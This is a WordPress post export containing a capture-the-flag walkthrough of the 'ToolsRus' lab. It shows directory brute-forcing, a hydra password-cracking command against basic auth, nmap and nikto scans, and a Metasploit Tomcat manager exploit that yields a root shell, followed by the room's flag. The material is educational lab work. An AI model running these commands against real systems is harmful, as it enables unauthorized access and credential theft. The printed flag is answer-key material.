﻿{"id":120,"date":"2020-06-01T07:52:13","date_gmt":"2020-05-31T23:52:13","guid":{"rendered":"https:\/\/byy3.com\/?p=120"},"modified":"2020-06-01T07:52:13","modified_gmt":"2020-05-31T23:52:13","slug":"toolsrus","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=120","title":{"rendered":"ToolsRus"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>[Task 1] ToysRus<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>What directory can you find, that begins with a g?<br>- Open DirBuster<br>- input target url and wordlist<br>- Click Start and wait<\/li><\/ol>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/963\/1*kQqLknY4EVODZp__dUBVmQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe\" alt=\"ToolsRus\u63d2\u56fe\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/950\/1*ObuQEW1058Y5TOSBvkurUg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe1\" alt=\"ToolsRus\u63d2\u56fe1\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">open \/guidelines\/<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.10.176.108\/guidelines\/\" target=\"_blank\" rel=\"noreferrer noopener\" rel=\"nofollow\" >http:\/\/&lt;ip&gt;\/guidelines\/<\/a><\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/599\/1*apFbbW708RsAKbn6ngd22Q.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe2\" alt=\"ToolsRus\u63d2\u56fe2\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">2. Whose name can you find from this directory?&nbsp;<strong>Bob<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3. What directory has basic authentication?&nbsp;<strong>Protected<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/964\/1*A7kgWZUbRGsAMI1RoJoEYg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe3\" alt=\"ToolsRus\u63d2\u56fe3\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1059\/1*rNI2shvEncWkiyFEFJC-gg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe4\" alt=\"ToolsRus\u63d2\u56fe4\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">4. What is bob\u2019s password to the protected part of the website?<br>I used hydra to crack the password with http-get form<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -l bob -P \/root\/Desktop\/rockyou.txt -f 10.10.176.108 http-get \/protected\/<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/933\/1*M5SvHh7_JPL1SrYGbwcQRQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe5\" alt=\"ToolsRus\u63d2\u56fe5\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Try to login with credential<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/881\/1*m7-SrzpdXjjXcpoWsCggEA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe6\" alt=\"ToolsRus\u63d2\u56fe6\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">5. What other port that serves a webs service is open on the machine?<br>Find open port<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap -Pn 10.10.176.108<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/741\/1*ZCwWGaoJRNcDIHxvDaFlbg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe7\" alt=\"ToolsRus\u63d2\u56fe7\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Find services<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap -sV -T 4 10.10.176.108<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/934\/1*uC8DN1IGcyILp3tHFS2PUQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe8\" alt=\"ToolsRus\u63d2\u56fe8\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Tomcat port is 1234<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">6. Going to the service running on that port, what is the name and version of the software?<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap -sV -A -T 4 10.10.176.108<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1151\/1*SQoozZ16Nozj00YGscGfdw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe9\" alt=\"ToolsRus\u63d2\u56fe9\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Apache Tomcat\/7.0.88<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Also access port 1234<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1394\/1*LM2254011_3gsKk6RCZtqw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe10\" alt=\"ToolsRus\u63d2\u56fe10\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">7. Use Nikto with the credentials you have found and scan the \/manager\/html directory on the port found above.<br>How many documentation files did Nikto identify?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Click Manager App<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1291\/1*b0eBYYtV5Na2YgEWXYFByQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe11\" alt=\"ToolsRus\u63d2\u56fe11\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Try with credential<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/980\/1*SDDOBp7e9Awqe4NZTMy3rQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe12\" alt=\"ToolsRus\u63d2\u56fe12\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1615\/1*nqCGezWkbNdm9V2FjJT8sQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe13\" alt=\"ToolsRus\u63d2\u56fe13\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s scan the site<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nikto -h <a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.10.131.147:1234\/manager\/html\" target=\"_blank\" rel=\"noreferrer noopener\" rel=\"nofollow\" >http:\/\/10.10.131.147:1234\/manager\/html<\/a> -id bob:&lt;password&gt;<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1030\/1*zIOlQRhDAoMv_rYAAYW6LA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe14\" alt=\"ToolsRus\u63d2\u56fe14\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>There\u2019re 5 documents.<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10. Where is Ektron CMS version information found?<br><strong>\/manager\/html\/WorkArea\/version.xml<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">9. What version of Apache-Coyote is this service using?&nbsp;<strong>1.1<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1151\/1*SQoozZ16Nozj00YGscGfdw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe9\" alt=\"ToolsRus\u63d2\u56fe9\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">10. Use Metasploit to exploit the service and get a shell on the system.<br>What user did you get a shell as?<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfconsole<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/658\/1*N-6fxG-lQlBMNpUpyEEBOA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe15\" alt=\"ToolsRus\u63d2\u56fe15\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">search tomcat<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">There\u2019re 3 exploits that I can use.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1163\/1*Z_AGWriStJDTMNouYdSgyg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe16\" alt=\"ToolsRus\u63d2\u56fe16\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">I tried to use #13 and #14, but it didn\u2019t work. I\u2019ll skip to #15.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">use 15<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/573\/1*fgSeYe1da57IAG0XAjN2qw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe17\" alt=\"ToolsRus\u63d2\u56fe17\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">show options<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1365\/1*H0RAerfHQej3eXp67e2K5g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe18\" alt=\"ToolsRus\u63d2\u56fe18\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">set HttpPassword &lt;password&gt;<br>set HttpUsername bob<br>set RHOSTS &lt;ip&gt;<br>set RPORT 1234<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/826\/1*-rmZQwHnnU9O2LI8JJFS8g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe19\" alt=\"ToolsRus\u63d2\u56fe19\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">run<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/1180\/1*31HBxGj3pOdcYa4WNAzebg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe20\" alt=\"ToolsRus\u63d2\u56fe20\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s get shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">shell<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/251\/1*XlOivSs9KC--vYekIWwwfA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe21\" alt=\"ToolsRus\u63d2\u56fe21\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">whoami<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/366\/1*-iL3GoQRe4QCvemKRDIemQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe22\" alt=\"ToolsRus\u63d2\u56fe22\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">What user did you get a shell as?&nbsp;<strong>root<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10. What text is in the file \/root\/flag.txt<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cd \/root<br>ls<br>cat flag.txt<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/miro.medium.com\/max\/408\/1*M34RExUWF13502maEMDAvQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"ToolsRus\u63d2\u56fe23\" alt=\"ToolsRus\u63d2\u56fe23\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>ff1fc4a81affcc7688cf89ae7dc6e0e1<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[Task 1] ToysRus What directory can you find, that begi [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-120","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=120"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/120\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}